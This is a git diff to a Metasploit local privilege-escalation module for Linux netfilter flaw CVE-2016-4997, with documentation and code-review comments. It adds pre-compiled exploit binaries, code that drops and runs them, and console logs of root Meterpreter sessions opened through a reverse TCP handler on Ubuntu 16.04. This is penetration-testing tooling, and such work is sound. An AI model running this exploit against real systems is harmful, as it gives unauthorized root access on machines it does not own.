diff --git a/data/exploits/CVE-2016-4997/2016-4997-decr.out b/data/exploits/CVE-2016-4997/2016-4997-decr.out new file mode 100644 index 0000000000..60390352a0 Binary files /dev/null and b/data/exploits/CVE-2016-4997/2016-4997-decr.out differ diff --git a/data/exploits/CVE-2016-4997/2016-4997-pwn.out b/data/exploits/CVE-2016-4997/2016-4997-pwn.out new file mode 100644 index 0000000000..343bbfacf3 Binary files /dev/null and b/data/exploits/CVE-2016-4997/2016-4997-pwn.out differ diff --git a/documentation/modules/exploit/linux/local/netfilter_priv_esc.md b/documentation/modules/exploit/linux/local/netfilter_priv_esc.md index 426e4cc6ac..42e0294dd7 100644 --- a/documentation/modules/exploit/linux/local/netfilter_priv_esc.md +++ b/documentation/modules/exploit/linux/local/netfilter_priv_esc.md @@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn. There are a few requirements for this module to work (ubuntu): 1. ip_tables.ko has to be loaded (root running iptables -L will do such) - 2. libc6-dev-i386 needs to be installed to compile - 3. shem and sham can not be installed/running + 2. shem and sham can not be installed/running This module has been tested against: 1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic) 2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic -This does not work against the following vulnerable systems. Additional work may be required. +This does not work against the following vulnerable systems. Additional work may be required to the binary and C code to enable these targets. 1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18) 2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19) 
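Review bot: the requirements list now drops `libc6-dev-i386`, but the module output further down in this same doc still runs "Checking if 32bit C libraries, gcc-multilib, and gcc are installed" and either live-compiles or drops the pre-compiled binaries depending on the result. The requirements section should say that explicitly, e.g. "gcc, gcc-multilib and libc6-dev-i386 are only needed if you want the exploit compiled on the target; without them the module drops the pre-compiled 2016-4997-decr.out / 2016-4997-pwn.out binaries", so readers know which of the two code paths they will hit and that the fallback is 32-bit only.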
@@ -28,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma 1. Start msfconsole 2. Exploit a box via whatever method - 4. Do: `use exploit/linux/local/ubuntu_netfilter` + 4. Do: `use exploit/linux/local/netfilter_priv_esc` 5. Do: `set session #` 6. Do: `set verbose true` 7. Do: `exploit` @@ -51,7 +50,7 @@ This does not work against the following vulnerable systems. Additional work ma ### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic) -Initial Access +#### Initial Access msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 127.0.0.1 
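Review bot: the step list in this hunk still jumps from "2. Exploit a box via whatever method" to "4. Do: `use exploit/linux/local/netfilter_priv_esc`"; since the line is being touched anyway, renumber the steps 1 through 6 so the procedure reads continuously.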
@@ -69,68 +68,151 @@ Initial Access [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -Escalate +#### Escalate - msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter - msf exploit(ubuntu_netfilter) > set session 1 - session => 1 - msf exploit(ubuntu_netfilter) > set verbose true - verbose => true - msf exploit(ubuntu_netfilter) > exploit - - [*] Started reverse TCP handler on 172.20.14.188:4444 - [*] Checking if libc6-dev-i386 is installed + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed [+] libc6-dev-i386 is installed - [*] Checking if ip_tables.ko is loaded + [+] gcc-multilib is installed + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if ip_tables is loaded in kernel [+] ip_tables.ko is loaded [*] Checking if shem or sham are installed [+] shem and sham not present. - [*] Writing desc executable to /tmp/452xNomE.c + [*] Writing desc executable to /tmp/fI1xW1Js.c [*] Max line length is 65537 - [*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf - [*] Executing /tmp/452xNomE, may take around 35s to finish. Watching for /tmp/rrOA1xsB to be created. + [*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf + [*] Executing /tmp/fI1xW1Js, may take around 35s to finish. Watching for /tmp/GWqpwKnG to be created. [*] Waited 0s so far [*] Waited 10s so far [*] Waited 20s so far [*] Waited 30s so far [+] desc finished, env ready. 
- [*] Writing payload to /tmp/HbFVMTZM + [*] Writing payload to /tmp/Thzyfenv [*] Max line length is 65537 [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf - [*] Writing pwn executable to /tmp/eRFqvuyG.c + [*] Writing pwn executable to /tmp/wmfFiQKu.c [*] Max line length is 65537 - [*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf + [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf [*] Transmitting intermediate stager for over-sized stage...(105 bytes) - [*] Sending stage (1495599 bytes) to 172.20.14.188 - [*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400 + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400 + [+] Deleted /tmp/fI1xW1Js.c + [+] Deleted /tmp/GWqpwKnG + [+] Deleted /tmp/fI1xW1Js + [+] Deleted /tmp/Thzyfenv + [+] Deleted /tmp/wmfFiQKu.c + [+] Deleted /tmp/wmfFiQKu + meterpreter > sysinfo + Computer : ubuntu + OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64) + Architecture : x86_64 + Meterpreter : x86/linux meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 -### Re-exploit +#### Escalate w/ pre-compiled binaries -In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again. 
- - msf exploit(ubuntu_netfilter) > set reexploit true - reexploit => true - msf exploit(ubuntu_netfilter) > set session 2 - session => 2 - msf exploit(ubuntu_netfilter) > exploit + msf exploit(netfilter_priv_esc) > exploit - [*] Started reverse TCP handler on 172.20.14.188:4445 - [*] Checking if libc6-dev-i386 is installed - [+] libc6-dev-i386 is installed - [*] Checking if ip_tables.ko is loaded + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [-] libc6-dev-i386 is not installed. Compiling will fail. + [-] gcc-multilib is not installed. Compiling will fail. + [-] gcc is not installed. Compiling will fail. + [*] Dropping pre-compiled exploit on system + [*] Checking if ip_tables is loaded in kernel [+] ip_tables.ko is loaded [*] Checking if shem or sham are installed [+] shem and sham not present. - [*] Writing payload to /tmp/OblBUbtc - [*] Writing pwn executable to /tmp/u4PnMEdw.c + [*] Max line length is 65537 + [*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf + [*] Executing /tmp/8lQZGJdL, may take around 35s to finish. Watching for /tmp/okDjTFSS to be created. + [*] Waited 0s so far + [*] Waited 10s so far + [*] Waited 20s so far + [*] Waited 30s so far + [+] desc finished, env ready. 
+ [*] Writing payload to /tmp/2016_4997_payload + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/nOO6sYqi + [*] Max line length is 65537 + [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf [*] Transmitting intermediate stager for over-sized stage...(105 bytes) - [*] Sending stage (1495599 bytes) to 172.20.14.188 - [*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400 - [+] Deleted /tmp/OblBUbtc - [+] Deleted /tmp/u4PnMEdw.c - [+] Deleted /tmp/u4PnMEdw - [-] Exploit failed: Rex::TimeoutError Operation timed out. - [*] Exploit completed, but no session was created. + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400 + [+] Deleted /tmp/okDjTFSS + [+] Deleted /tmp/2016_4997_payload + [+] Deleted /tmp/nOO6sYqi + + meterpreter > sysinfo + Computer : ubuntu + OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64) + Architecture : x86_64 + Meterpreter : x86/linux + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0 + +#### Re-exploit + +In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again. + + msf exploit(netfilter_priv_esc) > set reexploit true + reexploit => true + msf exploit(netfilter_priv_esc) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [+] libc6-dev-i386 is installed + [+] gcc-multilib is installed + [+] gcc is installed + [*] Live compiling exploit on system + [*] Checking if ip_tables is loaded in kernel + [+] ip_tables.ko is loaded + [*] Checking if shem or sham are installed + [+] shem and sham not present. 
+ [*] Writing payload to /tmp/egMfQrrI + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/Yf8CAdMu.c + [*] Max line length is 65537 + [*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400 + [+] Deleted /tmp/egMfQrrI + [+] Deleted /tmp/Yf8CAdMu.c + [+] Deleted /tmp/Yf8CAdMu + + meterpreter > + +#### Re-exploit w/ pre-compiled binaries + + msf exploit(netfilter_priv_esc) > set reexploit true + reexploit => true + msf exploit(netfilter_priv_esc) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed + [+] libc6-dev-i386 is installed + [-] gcc-multilib is not installed. Compiling will fail. + [-] gcc is not installed. Compiling will fail. + [*] Dropping pre-compiled exploit on system + [*] Checking if ip_tables is loaded in kernel + [+] ip_tables.ko is loaded + [*] Checking if shem or sham are installed + [+] shem and sham not present. + [*] Writing payload to /tmp/2016_4997_payload + [*] Max line length is 65537 + [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf + [*] Writing pwn executable to /tmp/SZrv2NOR + [*] Max line length is 65537 + [*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf + [*] Transmitting intermediate stager for over-sized stage...(105 bytes) + [*] Sending stage (1495599 bytes) to 192.168.2.137 + [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400 + + meterpreter 
> diff --git a/modules/exploits/linux/local/netfilter_priv_esc.rb b/modules/exploits/linux/local/netfilter_priv_esc.rb index 20c8ec1ec3..279b361491 100644 --- a/modules/exploits/linux/local/netfilter_priv_esc.rb +++ b/modules/exploits/linux/local/netfilter_priv_esc.rb @@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/, "execl(\"#{payload_path}\", NULL);") - def pwn(payload_path, pwn_file, pwn) + def pwn(payload_path, pwn_file, pwn, compile) # lets write our payload since everythings set for priv esc vprint_status("Writing payload to #{payload_path}") write_file(payload_path, generate_payload_exe) 
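Review bot: the "Escalate" section lost its setup commands. The old `use exploit/linux/local/ubuntu_netfilter` / `set session 1` / `set verbose true` lines were removed and not replaced, so the first run now starts at "[*] Started reverse TCP handler" with nothing showing how the module was selected or which session it targets, while the later "Re-exploit" sections do show `set reexploit true`. Add `use exploit/linux/local/netfilter_priv_esc`, `set session 1` and `set verbose true` (and `set session 1` before each pre-compiled run) so the sample output can be reproduced from the doc. Separately, the "Escalate w/ pre-compiled binaries" output lists Deleted lines for /tmp/okDjTFSS, /tmp/2016_4997_payload and /tmp/nOO6sYqi but none for the desc binary /tmp/8lQZGJdL, which matches the cleanup being commented out in the module; if that is intentional the doc should say the desc binary is left on the target.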
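Review bot: the `pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/, ...)` rewrite in the context above `def pwn(payload_path, pwn_file, pwn, compile)` only ever applies to the C source; when `compile` is false `pwn` is later replaced by the raw binary and the substitution is silently skipped, which is why `payload_path` has to be overridden to the path baked into the binary. That dependency is not obvious from this hunk; a one-line comment next to the gsub ("source only; the pre-compiled pwn binary has /tmp/2016_4997_payload hardcoded") would save the next reader from hunting for it.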
@@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup(payload_path) # now lets drop part 2, and finish up. - print_status "Writing pwn executable to #{pwn_file}.c" rm_f pwn_file - rm_f "#{pwn_file}.c" - write_file("#{pwn_file}.c", pwn) - cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") - register_file_for_cleanup("#{pwn_file}.c") + if compile + print_status "Writing pwn executable to #{pwn_file}.c" + rm_f "#{pwn_file}.c" + write_file("#{pwn_file}.c", pwn) + cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") + register_file_for_cleanup("#{pwn_file}.c") + else + print_status "Writing pwn executable to #{pwn_file}" + write_file(pwn_file, pwn) + end register_file_for_cleanup(pwn_file) cmd_exec("chmod +x #{pwn_file}; #{pwn_file}") end if not compile # we need to override with our pre-created binary # pwn file - path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2') + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') fd = ::File.open( path, "rb") pwn = fd.read(fd.stat.size) fd.close # desc file - path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1') + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') fd = ::File.open( path, "rb") decr = fd.read(fd.stat.size) fd.close + + # overwrite the hardcoded variable names in the compiled versions + env_ready_file = '/tmp/okDjTFSS' + payload_path = '/tmp/2016_4997_payload' end # check for shortcut if datastore['REEXPLOIT'] - pwn(payload_path, pwn_file, pwn) + pwn(payload_path, pwn_file, pwn, compile) else - print_status "Writing desc executable to #{desc_file}.c" - rm_f env_ready_file - rm_f "#{desc_file}.c" rm_f desc_file - write_file("#{desc_file}.c", decr) - output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") - + if compile + print_status "Writing desc executable to #{desc_file}.c" + rm_f "#{desc_file}.c" + 
write_file("#{desc_file}.c", decr) + register_file_for_cleanup("#{desc_file}.c") + output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") + else + write_file(desc_file, decr) + end + rm_f env_ready_file register_file_for_cleanup(env_ready_file) - register_file_for_cleanup("#{desc_file}.c") - register_file_for_cleanup(desc_file) + #register_file_for_cleanup(desc_file) if not file_exist?(desc_file) vprint_error("gcc failure output: #{output}") fail_with(Failure::Unknown, "#{desc_file}.c failed to compile") @@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local if file_exist?(env_ready_file) print_good("desc finished, env ready.") - pwn(payload_path, pwn_file, pwn) + pwn(payload_path, pwn_file, pwn, compile) return end sec_waited +=1
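Review bot: the pre-compiled branch falls through to a compile-only error path. When `compile` is false the new `else` just does `write_file(desc_file, decr)`, but the unchanged check right after it still reports `vprint_error("gcc failure output: #{output}")` and `fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")` if the file is missing, so a failed upload of the binary is reported as a gcc failure with an empty `output`; branch the message on `compile` (e.g. "failed to write #{desc_file}") and do the same for `pwn`, where `cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")` is never checked before `cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")` runs it. Two more points in the same hunk: `#register_file_for_cleanup(desc_file)` is now commented out with no explanation, so the desc binary is left on the target in both branches; if it must outlive the run, say so in a comment rather than leaving dead code, otherwise restore the cleanup. And `env_ready_file = '/tmp/okDjTFSS'` / `payload_path = '/tmp/2016_4997_payload'` are fixed, predictable names in world-writable /tmp that any other local user can pre-create or race, unlike the random names used on the compile path; at minimum add a comment that these values are compiled into 2016-4997-decr.out and 2016-4997-pwn.out and record how those binaries were built (the decr stage is built with `gcc ... -m32 -O2` on the compile path) so they can be regenerated if the paths ever change.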